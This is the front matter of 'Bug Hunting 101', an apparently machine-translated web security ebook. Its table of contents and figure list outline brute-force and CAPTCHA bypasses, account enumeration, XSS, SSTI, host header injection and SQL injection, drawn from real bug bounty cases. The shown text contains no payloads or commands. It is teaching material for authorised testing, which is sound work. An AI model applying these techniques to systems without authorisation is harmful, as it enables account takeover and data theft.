Bughunting101 English Version

Weather | i
BUG HUNT I NG 101
( Web Application Security)
40+ examples of real cases with various techniques
40.000+ USD have been paid
Equipped with basic explanations
By: Yoko Kho and Faisal Yudo Hernawan, 2019
- FIRST EDITION -
Bug Hunting 101 - First Edition free | https://alfursan.id

Web Application Security Testing Al-Fursan Cybersecurity Learning Resources
Weather | ii
FOREWORD
‫الرحمن هللا‬
‫الرحيم‬ ‫بسم‬
Praise be to Allah subhanahu wa ta'ala. We commend, pleading for help, and ask
His forgiveness. We seek refuge in Allah from the evil deeds ourselves and ugliness.
Whoever was given guidance by Allah Subhanahu wa Ta'ala then nothing can be misleading,
and whoever misled by God, then no one will be able to give him instructions.
We testify that none has the right to be worshiped but Allah alone, no partner to Him.
And we bear witness that Muhammad is His slave and His Messenger.
With the help of Allah, Alhamdulillah, after nearly 1 year old, finally the first edition
of electronic book-themed web-based application testing is completed.
As simple information, this book is one book that is expected to be
to guide the testers (both new and long-start) to be able to know tips
and certain tricks in the search for a vulnerability or bug activity in support of hunting
who was involved. In the manufacturing process, we tried to summarize the various references from
researcher (both at home and abroad) and we sort beradasarkan learning patterns
expected to be effective.
Should be noted that the things that have been described in this book have been made and
developed based on experience and observation Us during the plunge in this field. This matter
meaning that the analysis results can be changed along with the developments.
Nevertheless, God willing Us will always strive to present a decent test steps for
applied and continue to strive to provide improvements and additional material to
complement the deficiencies that exist in this book. So, waiting for the next version yes.
Writer, Yoko Kho and Faisal Yudo Hernawan, 2019
Personal Blog: http://firstsight.me
Linkedin: https://id.linkedin.com/in/config & https://id.linkedin.com/in/faisal-yudo-hernawan
Twitter: https://twitter.com/YoKoAcc & https://twitter.com/jrs_faisal
Medium: https://medium.com/@YoKoKho & https://medium.com/@FaisalYudo

Weather | iii
Document History
Version date Summary Initials
October 14, 2019 / Bug Hunting 101 (Web Application Security)

0.1 Wast 101
15 Shofar 1441H First edition
composer
Name Information
Yoko Kho Author
Faisal Yudo Hernawan Author
Azhar Abdussami Research team
Tomi Ashari Research team

Weather | iv
table of contents
FOREWORD ................................................ .................................................. ii .................................
Document History ................................................ .................................................. iii .................................
Composer ................................................. .................................................. iii ..............................................
Table of contents ................................................ .................................................. iv ................................................
List of picture ................................................ .................................................. ...................................... xi
ABSTRACT................................................. .................................................. ............................................ xviii
CHANGELOG ................................................. .................................................. xix ........................................
1. INTRODUCTION ............................................... .................................................. ................................... 1
1.1. Background ................................................ .................................................. ........................... 1
1.2. Scope ................................................ .................................................. ........................... 3
2. VIEWPOINT SECURITY TESTING ............................................ .................................................. ... 4
2.1. Vulnerability Assessment ................................................ .................................................. .......... 6
2.2. Penetration Test ................................................ .................................................. ........................ 7
2.3. Security Assessment ................................................ .................................................. .................. 8
2.4. Bug Hunting (Responsible Disclosure / Bug Bounty Program / etc) ...................................... ..... 9
3. APPROACH GUIDES .............................................. .................................................. ................... 11
4. TEST SUMMARY BASIS ............................................. .................................................. ....................... 13
4.1. Conclusions The use of Method Test Summary Basic ............................................ ................. 19
5. RECONNAISSANCE ............................................... .................................................. ............................ 20
5.1. Finding Sub-Domain of A Target ........................................... ......................................... 21
5.1.1. Reverse IP Lookup Method (Use of the Same Server) ........................................ 21
5.1.2. Sub-Domain Enumeration with Automation Tools ........................................... ......... 23
5.2. Seeing the state of the Target Sub-Domain ........................................... ................................... 27
5.2.1. Directory / File Brute Force ............................................. ................................................ 27
5.2.2. Directory / File Brute Force Part II - Web Crawling ........................................ ............ 29
5.3. Conclusion Basic Reconnaissance Phase .............................................. .................................. 29
5.4. Reference Reconnaissance ................................................ .................................................. ....... 30
6. SUB-DOMAIN Takeover ............................................ .................................................. ..................... 31

Weather | v
6.1. The Basics of Sub-Domain Takeover ............................................ ....................................... 31
6.2. Basic Concepts Sub-Domain Takeover ............................................ ............................................ 31
6.3. Impact of Sub-Domain Takeover ............................................. .................................................. .. 35
6.4. Step Execution Sub-Domain Takeover ............................................ ...................................... 35
6.4.1. Execution of the External Pointing (TLD External Name) - Nokia Case ....................... 37
6.4.2. Execution of the External Pointing (Third Party Content Provider) ............................. 39
6.4.3. Execution of the Second Order Domain ............................................. .......................... 42
6.5. Reference Sub-Domain Takeover ............................................. .................................................. 43
7. INTERCEPTOR & FORWARDER TRAFFIC WEB APPLICATION TOOLS ......................................... ......... 45
7.1. The reason it needs Traffic Interceptor and Forwarder ............................................ ............ 45
7.2. Installing the JRE and the Burp Suite Running ............................................ ..................................... 47
7.3. Intercept Traffic Data on Web-Based Applications - Track HTTP ....................................... 50
7.4. Intercept Traffic Data on Web-Based Applications - Track HTTPS ...................................... 53
7.5. Burp Suite Installation Reference CA on Multiple Browser .......................................... ............. 56
8. BASIC CONCEPT AND METHOD IN HTTP GET POST ........................................ .............................. 57
9. INFORMATION DISCLOSURE VIA SEARCH ENGINE ........................................... ................................. 59
9.1. Discussion Technique - First Case - Case Yammer .......................................... ................... 60
9.2. Google Dork glimpse ............................................... .................................................. .................. 62
9.3. Discussion Techniques - Second Case - Case PayPal .......................................... .......................... 63
9.4. Discussion Techniques - Third Case - Case Trello .......................................... ........................... 66
9.5. Crawling Bot Prevention against It Sensitive ............................................ ........................... 69
9.6. Reference Information Disclosure via Search Engine ............................................ ..................... 70
ACCOUNT AND PASSWORD MECHANISM .............................................. ............................................... 71
BRUTE FORCE ATTACK 10. - CHECK Weak ....................................... LOCK OUT MECHANISM ............. 72
10.1. Simple meaning Brute Force .............................................. .................................................. 72
10.2. Why should Account and Password? - Google Case ............................................... ............. 72
10.3. Common Usernames and Passwords .............................................. ........................................ 73
10.4. Basic Brute Force Attack (Kind of Brute Force Attack) ....................................... ..................... 74
10.4.1. Basic Brute Force Attack Part I - Direct Attack to Password ....................................... . 74

Weather | vi
10.4.2. Basic Brute Force Attack Part II - Page Redirection ......................................... ............. 81
10.4.3. Basic Brute Force Attack Part III - Numbers as Payload - Facebook Case ................... 85
10.4.4. Basic Brute Force Attack Part IV - Two or More Payloads ....................................... .... 87
10.4.5. Basic Brute Force Attack V - Encode the Payload - HTTP Basic Authentication .......... 90
10.5. Bypassing Brute Force Protection (Kind of Brute Force Bypass) ....................................... ...... 96
10.5.1. Bypass Method Part I - Bypassing CAPTCHA Protection .......................................... ..... 96
10.5.1.1. CAPTCHA Definitions ................................................ ................................................ 96
10.5.1.2. Common Request with CAPTCHA .............................................. ......................... 97
10.5.1.3. Execution example Bypass CAPTCHA - Veris Case ........................................... ...... 98
10.5.1.3.1. Burp Suite - Repeater Mode ............................................. ..................... 100
10.5.2. Bypass Method Part II - Added Custom Header - Dashlane Case ............................. 102
10.5.3. Bypass Method Part III - Check the Mobile Request - Instacart Case ....................... 103
10.5.4. Bypass Method Part IV - Check the API - Asus Case ....................................... ........... 104
10.6. Reference Brute Force Attack .............................................. .................................................. . 107
11. CHECK FOR ACCOUNT (LOGIN) enumeration ......................................... ................................... 109
11.1. Common Applications Login Identity at ............................................. ................................... 109
11.2. Basic Account Enumeration ............................................... .................................................. .. 110
11.2.1. Enumeration account via Login Form - Veris Case .......................................... .......... 110
11.2.2. Account Enumeration via Forgot Password Feature - Infogram Case ....................... 111
11.2.3. Account Enumeration via Resend Confirmation Feature - Xoom Case ..................... 112
11.2.4. Account Enumeration by Using Search Engine - Xoom Case ..................................... 114
11.2.5. Enumeration account via Sign Up Feature - HackerOne Case ................................... 116
11.3. Reference Check for Account Enumeration ............................................. .............................. 116
12. COMMON AND PASSWORD CHECKING ACCOUNT ........................................... ............................ 118
12.1. Password Complexity Checking ............................................... .............................................. 118
12.1.1. Password Complexity Check via Registration Feature ............................................ .... 118
12.1.2. Password Complexity Check via the Change Password Feature ....................................... 119
12.1.3. Password Complexity Check via the Change Password Feature from the Reset Password .... 119
12.1.4. Password Complexity Check via the Used of Specific Characters ............................... 120

Weather | vii
12.2. Minimum Password Length Checking .............................................. ..................................... 120
12.3. Minimum Password History Checking .............................................. ..................................... 121
12.4. Maximum Password Age ............................................... .................................................. ...... 122
12.5. Change Password for the First Time Use ........................................... .................................... 122
12.6. Reference for Common Checking Account and Password ........................................... .......... 122
MECHANISM MANAGEMENT SESSION ............................................... ................................................. 124
13. MANAGEMENT SESSION .............................................. .................................................. ................ 125
13.1. Session is not Expired - Hackerone and WakaTime Case ......................................... ............ 125
13.2. Cookies Attribute Setup is not yet ............................................ ............................................. 126
13.2.1. Few Words about using cookies to login ........................................... ........................ 126
13.2.2. Few Words about "Secure" Flag / Attribute at Cookies ....................................... ...... 126
13.2.2.1. Check for "Secure" Flag at Cookies Attribute - IRCCloud and Gratipay Case ..... 126
13.2.3. Few Words about "HTTP-Only" Flag / Attribute at Cookies ..................................... .. 128
13.2.3.1. Check for "HttpOnly" Flag at Cookies Attribute - Qiwi and Concrete5 Case ...... 128
13.3. Unexpired Reset Password Link .............................................. .............................................. 129
13.3.1. Unexpired Reset Password Link - Never Use - Veris ......................................... ......... 129
13.3.2. Used Reset Password Link is Never Expired - Case WakaTime .................................. 130
13.3.3. 1 st Reset Password Link is not Expired after use the 2 nd Link - Few Cases ................... 130
13.3.4. Reset Password did not Expired after Changing Email Address - WakaTime Case ...... 131
13.4. Reference for Session Management .............................................. ........................................ 131
INPUT VALIDATION ................................................ .................................................. ............................ 133
14. Cross Site Scripting (XSS) .......................................... .................................................. .............. 134
14.1. Kind of Cross Site Scripting ............................................. .................................................. ..... 135
14.1.1. Reflected Cross Site Scripting .............................................. ........................................ 135
14.1.2 Stored Cross Site Scripting ........................................... ................................................ 136
14.1.3. Dom-Based Cross Site Scripting ............................................ ...................................... 138
14.2. Basic Concept of Cross Site Scripting Attack ........................................... .............................. 139
14.3. Sample Cases ................................................ .................................................. ....................... 140
14.3.1. Reflected Cross Site Scripting - Shopify Case ........................................... .................. 140

Weather | viii
14.3.2. Stored Cross Site Scripting - Snapchat Case ........................................... .................... 142
14.3.3. Blind Cross Site Scripting - Case Tokopedia ........................................... ..................... 144
14.3.4. Dom Based Cross Site Scripting - Twitter Case .......................................... ................. 146
14.4. Reference of Cross Site Scripting ............................................. .............................................. 148
15. CONTENT INJECTION .............................................. .................................................. ...................... 150
15.1. Basic Concept of Content Injection ............................................. .......................................... 150
15.2. Kind of Content Injection .............................................. .................................................. ....... 151
15.2.1. Text Injection - SEMRush and LocalTapiola Case ........................................... ............. 151
15.2.2. HTML Injection ................................................ .................................................. .......... 152
15.2.2.1. Common HTML Injection - Infogram Case ............................................ .................. 152
15.2.2.2. HTML Injection (Output has been Triggered via Email) - Slack Case ...................... 153
15.3. Reference of Content Injection .............................................. ............................................... 154
16. TEMPLATE SERVER SIDE INJECTION (SSTI) ......................................... ............................................ 155
16.1. Server Side Template Injection 101 ............................................. .......................................... 155
16.1.1. Detection ................................................. .................................................. .................. 156
16.1.2. Identification ................................................. .................................................. ............ 157
16.1.3. Exploitation ................................................. .................................................. .............. 158
16.2. Server Side Template Injection - Uber Case ........................................... .............................. 161
16.3. Server Side Template Injection - Intel Case ........................................... ............................... 163
16.4. Server Side Template Injection with TPLmap ............................................ ............................ 164
16.5. Reference of Server-Side Template Injection ........................................... ............................ 166
17. HOST HEADER INJECTION (HHI) .......................................... .................................................. ......... 167
17.1. Kind of Host Header Injection ............................................. .................................................. 168
17.2. Host Header Injection - Redirection - Whisper Case .......................................... ................. 168
17.3. Host Header Injection - Account Takeover - The Concept ......................................... ......... 169
17.3.1. Host Header Injection - Account Takeover - Mavenlink Case ................................... 171
17.4. Reference of Host Header Injection ............................................. ......................................... 171
18. SQL INJECTION .............................................. .................................................. ............................... 173
18.1. Kind of SQL Injection .............................................. .................................................. ............. 174

Weather | ix
18.1.1. Error Based SQL Injection .............................................. .............................................. 174
18.1.2. Blind SQL Injection ............................................... .................................................. ..... 175
18.1.3. Union-Based SQL Injection ............................................. ............................................. 178
18.2. Basic Concept of SQL Injection Attack ............................................ ....................................... 178
18.3. Sample Cases ................................................ .................................................. ....................... 179
18.3.1. Error Based SQL Injection - Bootcamp.Nutanix.com Case ....................................... .. 179
18.3.2. Common Blind SQL Injection Attack - Zomato Case .......................................... ........ 181
18.3.3. Blind SQL Injection Attack via User-Agent - Private Program .................................... 182
18.3.4. Time Based SQL Injection - Starbucks Program ........................................... .............. 186
18.3.5. Simple SQL Injection to bypass Login Form - Sample from Multillidae II .................. 189
18.3.6. Error Based SQL Injection with Page Redirection - Private Program ......................... 191
18.4. Auto SQL Injection with Mapper (Basic Use) ......................................... ............................... 193
18.4.1. Way to Use the SQL Map ............................................ ................................................ 194
18.4.1.1. Basic Concept ................................................ .................................................. .. 194
18.4.1.2. Using SQL Map via Direct Command ............................................ .................... 195
18.4.1.3. Using SQL Map via Saved Files ............................................ ............................... 198
18.4.2 Simple Cover - SQL Map .......................................... ......................................... 200
18.5. Reference of SQL Injection .............................................. .................................................. .... 200
CLOSING THE FIRST EDITION ............................................... .................................................. .................. 202
CLOSING ................................................. .................................................. ..................................... 203
BIBLIOGRAPHY ................................................ .................................................. .............................. 204
0x01. Reconnaissance ................................................. .................................................. .................. 204
0x02. Sub-Domain Takeover .............................................. .................................................. ........... 204
0x03. Interceptor and Forwarders Traffic Web-Based Application Data .................................... 205
0x04. Method Basic Concepts on HTTP GET and HTTP POST ......................................... .............. 205
0x05. Information Disclosure via Search Engine ............................................. ............................... 206
0x06. Brute Force Attack ............................................... .................................................. ............... 206
0x07. Check for Account Enumeration .............................................. ............................................. 207
0x08. Reference for Common Checking Account and Password ........................................... ......... 208

Weather | x
0x09. Cross Site Scripting ............................................... .................................................. ............... 208
0x10. Content Injection ................................................ .................................................. ................ 209
0x11. Server-Side Template Injection ............................................. ............................................... 209
0x12. Host Header Injection ............................................... .................................................. .......... 210
0x13. SQL Injection ................................................ .................................................. ....................... 210

Weather | xi
D lists are G AMBAR

Figure 1 Top Data Compromised Varieties ............................................ .................................................. . 2
Figure 2 Actors and Motives in Breaches ........................................... .................................................. ..... 2
Figure 3 Best Practices / Frameworks ............................................ .................................................. ......... 4
Figure 4 End-to-End Security Testing Point of View ...................................... ............................................ 4
Figure 5 Threat Source and Motivation ............................................ .................................................. ...... 5
Figure 6 Types ............................................ Testing .................................................. ....................... 6
Figure 7 Vulnerability Assessment I - Pic. from Akamai ................................................ ........................... 6
Figure 8 Vulnerability Assessment II - Pic. from Akamai ................................................ .......................... 7
Figure 9 Web Application Security Assessment ............................................ .......................................... 11
Figure 10 Reverse IP Lookup with "You Get signal" ....................................... ......................................... 22
Figure 11 Sub-Domain Search page on VirusTotal ......................................... ......................... 23
Figure 12 Found 100+ Sub-domains .......................................... .................................................. .... 24
Figure 13 Example Simple Enumeration Results ............................................ ............................................ 25
Figure 14 Table Comparison of Sub-Domain Enumeration Tools ......................................... ................... 26
Figure 15 Few of the Sub-Domains at bitdefender.com ....................................... ........................................ 26
Figure 16 Scanning is Completed ............................................. .................................................. ............. 28
Figure 17 General Flow of Communication - https://0xpatrik.com/subdomain-takeover-basics/ ........ 31
Figure 18. Example Pointing to the External Domain ........................................... ........................................... 33
Figure 19 Example Pointing to 3rd Party Content Provider - https://hackerone.com/reports/121461 .. 34
Figure 20 Sample Identification of Second-Order Sub-Domain ........................................ .............................. 34
Figure 21 Output of "dig" to the sub-domain nstring2qa.nokia.com .................................. ........... 35
Figure 22 Example of output when Viewed cname_output.txt ......................................... ......................... 37
Figure 23: List of CNAME Output ............................................ .................................................. ............... 37
Figure 24 Dig Result to nstring2qa.nokia.com ........................................ ................................................ 38
Figure 25 Domain is Available I ............................................ .................................................. ................. 38
Figure 26 Domain is Available II ............................................ .................................................. ................ 38
Figure 27 Cloudfront unregulated ............................................ .................................................. ... 40
Figure 28 CloudFront Distributions - Create ............................................ ............................................... 40

Weather | xii
Figure 29 "Get Started" with CloudFront Distributions section "Web" ..................................... .............. 40
Figure 30 Origin Settings .............................................. .................................................. ......................... 41
Figure 31 Entering jobs.ycombinator.com into CNAME ....................................... .................... 41
Figure 32 Configuration has been Saved ............................................ .................................................. ... 41
Figure 33 Sub-Domain Takeover - Proof of Concept ........................................ ....................................... 42
Figure 34 Sub-domains belonging to Example.com ......................................... .................................................. ... 42
Figure 35 Second Order Sub-Domain - https://0xpatrik.com/second-order-bugs/ ............................ . 43
Figure 36 Flow Pulse common to Purchase Confirmation .......................................... ............................. 45
Figure 37 Flow common to Purchase Confirmation Toll - with Traffic Interceptor ........................ 46
Figure 38 Burp Suite Community Edition ............................................ .................................................. .. 47
Figure 39 JRE Download - Keyword at Google .......................................... .............................................. 48
Figure 40 Page Official Portal Download JRE Oracle ......................................... ...................................... 48
Figure 41 Display JRE has been installed ......................................... ................................................ 49
Figure 42 Burp Suite has Walk ............................................ .................................................. ........... 49
Figure 43 Burp Suite is Running ............................................ .................................................. ................ 50
Figure 44 Deadly Mode Intercept ............................................. .................................................. ..... 50
Figure 45 Menu "Proxy Listeners" ........................................... .................................................. .............. 51
Figure 46 Menu "Preferences" and "Settings" ........................................ ................................................ 51
Figure 47 Proxy Settings .............................................. .................................................. .................... 52
Figure 48 Catch Traffic Data via Burp Suite ......................................... ............................. 52
Figure 49 Connection is Failed ............................................. .................................................. ................. 53
Figure 50 Accessing http: // burp .......................................... .................................................. ............... 53
Figure 51 Download CA Certificate ............................................. .................................................. ....... 54
Figure 52 Menu "Certificates" on Firefox .......................................... .................................................. 54
Figure 53 Certificate Import Browser owned Burp Suite on ......................................... ......................... 54
Figure 54 Trust Certificate at Browser ............................................ .................................................. ...... 55
Figure 55 "View Certificates" at Browser .......................................... .................................................. .... 55
Figure 56 Opening the Google of Certificate belonging to Burp Suite ......................................... ........................ 55
Figure 57 HTTPS Traffic on the Strip has been successfully intercept ....................................... .......................... 56

Weather | xiii
Figure 58 Sample of the GET method ............................................ .................................................. .............. 57
Figure 59 Sample GET Request with Method ........................................... .......................................... 57
Figure 60 Sample Login Form POST Method .......................................... .................................... 58
Figure 61 Sample Request POST Method ........................................... ........................................ 58
Figure 62 Display XML when Accessing ........................................... ......................................... 61
Figure 63 Accessing Another User Account ............................................ ................................................. 62
Figure 64 Trying to Take Another User Information ........................................... ........................... 64
Figure 65 Trying Enumeration Invoice ............................................. .................................................. .... 65
Figure 66 Example One Accessed Invoice .......................................... ....................................... 66
Figure 67 Information Disclosure via Google Dork - Intext Dork I ....................................... ................... 67
Figure 68 Information Disclosure via Google Dork - Intext Dork II ....................................... .................. 67
Figure 69 Information Disclosure via Google Dork - Bug Fixing ........................................ ...................... 68
Figure 70 Information Disclosure via Google Dork - Sensitive Credentials I ....................................... .... 68
Figure 71 Information Disclosure via Google Dork - Sensitive Credentials II ....................................... ... 68
Figure 72 POST Method - Username and Password .......................................... ..................................... 75
Figure 73 "Send to Intruder" ........................................... .................................................. ...................... 75
Figure 74 Intruder Menu - "Targets" Tab ......................................... .................................................. ...... 76
Figure 75 "Payload Positions" ............................................ .................................................. ................... 76
Figure 76 Remove Highlight the "Clear $" ......................................... ................................... 77
Figure 77 Highlight Parameter "Pass" ........................................... .................................................. ........ 77
Figure 78 Adding a "word" Manual .......................................... .......................................... 78
Figure 79 Adding a Password Automatically from a File ........................................ ........... 78
Figure 80 Password successfully Added ............................................ ............................................... 79
Figure 81 Examples of file that contains Password .......................................... .......................................... 79
Figure 82 Starting Attack "Start Attack" .......................................... ................................................. 79
Figure 83 Auto Brute Force Attack ............................................ .................................................. ............ 80
Figure 84 Success Log of Brute Force Results .......................................... ............................................... 81
Figure 85 Username and Password is worth Valid .......................................... ....................................... 81
Figure 86 "Redirections" Options on Burp Suite ......................................... ........................................ 82

Weather | xiv
Figure 87 Response after Set Page Redirection ........................................... ............................ 82
Figure 88 Example Simple Flow ............................................. .................................................. ........... 83
Figure 89 Response Length - Failed and Success .......................................... .......................................... 83
Figure 90 Click the Sort ............................................. .................................................. .......................... 84
Figure 91 Example of Response Fail - Login Failed on the "Body" ...................................... ......................... 84
Figure 92 Example of Failed Login - "Failed" at "Response Body" .................................... ............................. 84
Figure 93 Changing the "Payload Type" to Numbers ......................................... ............................... 85
Figure 94 Inserting "Number Range" in the "Payload Options" ...................................... ................... 86
Figure 95 Brute Force Attack - "Numbers" as Payloads ....................................... ................................... 86
Figure 96 Request for Login Activity ............................................ .................................................. ........... 87
Figure 97 Total of Payload Set ............................................ .................................................. ................... 88
Figure 98 "Payload Set" 1 - Setup the List of Username ..................................... .................................... 88
Figure 99 "Payload Set" 2 - Setup the List of Password ..................................... ..................................... 89
Figure 100 Sample of Request with Two Payloads Set ......................................... .................................. 89
Figure 101 Sample of Request ............................................. .................................................. .................. 90
Figure 102 Highlight the Base64 Parameter ............................................ ............................................... 91
Figure 103 Setup the Payload Type to Custom Iterator ......................................... ................................. 92
Figure 104 Add the Password and Separator ........................................... ............................................... 92
Figure 105 List of Passwords ............................................. .................................................. .................... 93
Picture 106 "Payload Processing" Feature ........................................... .................................................. .. 93
Figure 107 Add Payload Processing Rule - Encode to Base64 ........................................ ........................ 94
Figure 108 Encode to Base-64 ........................................... .................................................. .................... 94
Figure 109 Normal - With "=" .......................................... .................................................. ...................... 95
Figure 110 Remove the "=" ........................................... .................................................. ........................ 95
Figure 111 Parameter was Encoded to Base64 ........................................... ............................................ 95
Figure 112 Decode Result - Burp Suite ........................................... .................................................. ....... 96
Figure 113 Sample CAPTCHA by Google ............................................ .................................................. ... 97
Figure 114 Sample Request with g-recaptcha-response ........................................ ................................. 98
Figure 115 Request with g-recaptcha-response ......................................... ............................................ 99

Weather | xv
Figure 116 Request without g-recaptcha-response ......................................... ....................................... 99
Figure 117 Removing the g-recaptcha-response - https://hackerone.com/reports/124173 .............. 100
Figure 118 Send the request to Repeater ........................................... ................................................. 100
Figure 119 Interface of Repeater Mode ............................................ .................................................. .. 101
Figure 120 Many Tabs to be Analyzed ........................................... .................................................. ..... 101
Figure 121 Attempt was Blocked by Dashlane ........................................... ........................................... 102
Figure 122 Bypassing Brute Force Protection at Dashlane - https://hackerone.com/reports/225897 103
Figure 123 CAPTCHA at Asus Portal ............................................ .................................................. ........ 104
Figure 124 API-ID at Asus VivoBaby Mobile Application ........................................ ............................... 105
Figure 125 API endpoints at Asus VivoBaby Mobile Application ......................................... ................... 105
Figure 126 Endpoint to Login - Belong to Asus ......................................... ............................................ 105
Figure 127 Trying to login from Asus API .......................................... .................................................. . 106
Figure 128 Failed to login - Response Length 752 - Failed ....................................... ............................ 106
Figure 129 Success to Log - 1106 Response Length - Valid ....................................... ......................... 107
Figure 130 Input the Email at Login Form .......................................... .................................................. . 110
Figure 131 Invalid Username - Failed Response ........................................... ........................................ 111
Figure 132 Resend Email Feature ............................................. .................................................. ........... 112
Figure 133 Account Enumeration Process via "Resend Confirmation Email" ...................................... 113
Figure 134 Account not Found - Invalid Email .......................................... ............................................ 114
Figure 135 Information Disclosure via Search Engine - Email Enumeration ........................................ 115
Figure 136 Information Disclosure via Search Engine - Email Enumeration ........................................ 115
Figure 137 Simple Step that conduct by Wdem .......................................... .......................................... 119
Figure 138 Password Complexity is not Implemented at Change Pwd from the Reset Password Feature 119
Figure 139 Bypass Password Complexity with Empty Spaces .......................................... ..................... 120
Figure 140 Bypass Minimum Password Length ........................................... Policy ............................... 120
Figure 141 Bypass the Minimum Password Length Policy II ......................................... ........................ 121
Figure 142 Executing "Edit This Cookie" Extension ......................................... ...................................... 127
Figure 143 Cookies Attribute at Hackerone ............................................ .............................................. 127
Figure 144 Cookies Flag / Attribute Setup is not yet ........................................ ..................................... 128

Weather | xvi
Figure 145 Statistic of XSS (OWASP and Rapid7) ........................................ .......................................... 134
Figure 146 Sample of Attack - Reflected XSS via Malicious Email ....................................... ................. 136
Figure 147 Simple Explanation Stored XSS ............................................ ................................................ 138
Figure 148 Sample Flow of Dom-Based XSS ......................................... ................................................. 139
Figure 149 Pop-Up Alert Sample ........................................... .................................................. .............. 140
Figure 150 Triggered Script Output from ............................................ .................................................. 141
Figure 151 Output from Triggered Script - document.cookie ........................................ ...................... 141
Figure 152 Trying to Inject the Simple HTML Script ......................................... ..................................... 142
Figure 153 Inviting other Member ............................................. .................................................. ......... 142
154 Picture Script has been Reflected via Email .......................................... .......................................... 143
155 Picture Script has been Reflected at the Page (and Stored at the Database) ................................. 143
Figure 156 Domain Information has been Reflected via Javascript ......................................... ............. 144
Figure 157 Trying to injecting the XSS Hunter Field Name Script at ...................................... ............... 145
Figure 158 Dashboard Notification at XSS Hunter ........................................... ..................................... 145
Figure 159 Internal Dashboard of Tokopedia - Show with Blind XSS ....................................... ............. 146
Image has 160 Script Executed at Client Side by Using Dom-Based Vulnerability ............................... 148
Figure 161 Sample of Content Injection with Text .......................................... ...................................... 150
Figure 162 Text Injection at SEMRush Program - https://hackerone.com/reports/327671 ................. 151
Figure 163 Text Injection at LocalTapiola - https://hackerone.com/reports/181594 .......................... 152
Figure 164 HTML Injection at Infogram - https://hackerone.com/reports/283742 ............................ 153
Figure 165 HTML Injection at First Name - Triggered at Email ....................................... ..................... 153
Figure 166 SSTI Methodology - SSTI: RCE for Modern Web App by Portswigger ................................ 156
Figure 167 The Used of Wappalyzer ............................................ .................................................. ....... 156
Figure 168 The Used of Buildwith Tools ........................................... .................................................. ... 157
Figure 169 Decision Tree to Identify the Template Engines - by James Kettle .................................... 158
Figure 170 Templates injections ............................................ Cheat Sheets ........................................... 159
Figure 171 Templates Injection at Uber ............................................ .................................................. ... 161
Figure 172 Dumping the Class via SSTI ........................................... .................................................. ..... 162
Trying to Figure 173 Executing the Python Code .......................................... ........................................ 162

Weather | xvii
Figure 174 Trying to Put the Payloads ........................................... .................................................. ...... 163
Figure 175 Intel Application has responsed the Input .......................................... ............................... 163
Figure 176 Read the / etc / passwd via SSTI ........................................ .................................................. .. 164
Figure 177 Sample of Request ............................................. .................................................. ................ 167
Figure 178 Modifying the Host Header from Whisper.sh to Crowdshield.com ................................... 169
Figure 179 Sample of Host Header Injection ........................................... ............................................. 170
Figure 180 Sample of logs at the assessor's Server .......................................... ........................................... 170
Figure 181 Bypassing the Protection of Host Header Injection ......................................... ................... 171
Figure 182 SQL Injection Rank from Akamai and OWASP ......................................... ............................ 173
Figure 183 Trying to injecting the parameters ........................................... ............................................ 179
Figure 184 Trying to Look the SQL Version .......................................... ................................................. 180
Figure 185 SQL Injection Automation with SQL Map .......................................... .................................. 181
Figure 186 Normal Response - without any single quote ......................................... ........................... 183
Figure 187 Unauthorized Response after injecting the User-Agent ........................................ ............. 183
Figure 188 Injecting with "True" Payload - Success ........................................ ...................................... 184
Figure 189 Injecting with "False" Payload - Success ........................................ ..................................... 184
Figure 190 Injection Attempt to Find out the Database Name ........................................ .................... 185
Figure 191 Attack Trial Time-Based SQL Injection ......................................... ......................... 186
Figure 192 Application did not Sleep ........................................... .................................................. ......... 187
Figure 193 Found the DBMS Version ............................................ .................................................. ...... 188
Figure 194 Time-Based SQL Injection with SQL Map ........................................ .................................... 188
Figure 195 Sample of Injection at Login Form .......................................... ............................................ 189
Figure 196 Success to Login ............................................. .................................................. .................... 189

Weather | xviii
ABSTRACT
Should be noted that the authors and others involved in the making of this ebook leaving
away from the use of writing / 'science devoted to things that are outside of shari'ah.
Everything outlined here aims to provide an overview and / or teaching
to colleagues who need it on a daily or job. If
there is a mismatch against the shari'ah will do things in their daily life, then it
it is not part of the responsibility of the authors and the team.
May the 'knowledge learned can be used as good as possible for the purpose of being justified.
What is actually done by the examiners or bug hunter when testing an application?
What is actually considered by them when seeing an application or even when new
The first to hear the application name or the name of the target?
What information is needed to be able to test an optimal targets?
Vulnerabilities such as what is acceptable to the owner?
What is the methodology used to test an application?
What to look for first when seeing an application?
Are there any tools that are used to facilitate the testing?
Not a bit of writer's encounter similar questions from colleagues who want / start learning in
the field of security, especially those for testing web based applications. On the other hand, some of these questions
was not immune submitted by fellow professional testers who want to plunge into the realm of bugs
hunting.
With hope and the blessings of God and then of seeing the situation, the authors tried to
create a guide that may be able to provide an overview to all colleagues
require both fellow professionals and a new start, and both for the
personal, as well as for the organization.
In the manufacturing, the authors also included some simple description of the test model
Formal generally conducted, such as Vulnerability Assessment, Penetration Test, or Security
Assessment.
A brief note: earlier, the first article of this ebook has been given to one organization

Weather | xix
which requires a picture of testing an application. However, given that InsyaAllah how
many positive things that may be provided to the general public, then the author
took the initiative to release it publicly by editing and adding some basic
the material in advance so as to further expand the discussion.
In the future, God willing, the author will continue to develop and improve this article so that it can
be a comprehensive reference in a test.
0.1. CHANGELOG
First Edition:
Broadly speaking, this first edition contains the common foundation is required in the test
a web-based application. Under the existing situation, the discussion in this edition is not yet
too touching to be steps to manipulate the flow of an application.
God willing, in the next edition, the author will discuss various examples of cases related to the test model
involves manipulating a process flow in the application is accompanied by a variety of methodologies
Interesting.
As outlined, the issues discussed in this edition consists of:
• General introduction regarding the model of security testing, including bug hunting related
responsible disclosure and bug bounty program;
• The basic concept of search information on a target to be tested;
• Sub-domains Takeover;
• Why we need an interceptor and forwarder in testing;
• The basic concepts related HTTP GET and POST method; and
• Measures related testing sensitive exposure of data via google dork, and account mechanism
password, session establishment mechanisms, as well as input validation.

Weather | 1
1. PRELIMINARY
This guide is organized as one of the references that are expected to be used by the testers
to be able to understand the general flow of the test or perform an activity
bug hunting activity against web-based applications in order to identify vulnerabilities
potentially disrupting components of the confidentiality, authenticity, and availability of the relevant application.
In it are also included Problem solving and general reference to
used as a foundation for a test or by reference
in the development of other testing techniques.
1.1. Background
No denying that at the moment looks quite a lot of industries that make data from
each user to be the main content of the movement-owned businesses. One of
Her real-life examples that many social media companies are no longer experiencing difficulties
to create the content because the majority of its content comes from registered users. In
the other hand, not infrequently encountered when an airline ticket provider company does not need
again have an aircraft, a e-commerce that does not make possession of a physical store
as mandatory, as well as a transport online not need to have a vehicle for
leased. In fact, there is one interesting fact presented by Daniel Burrus on one
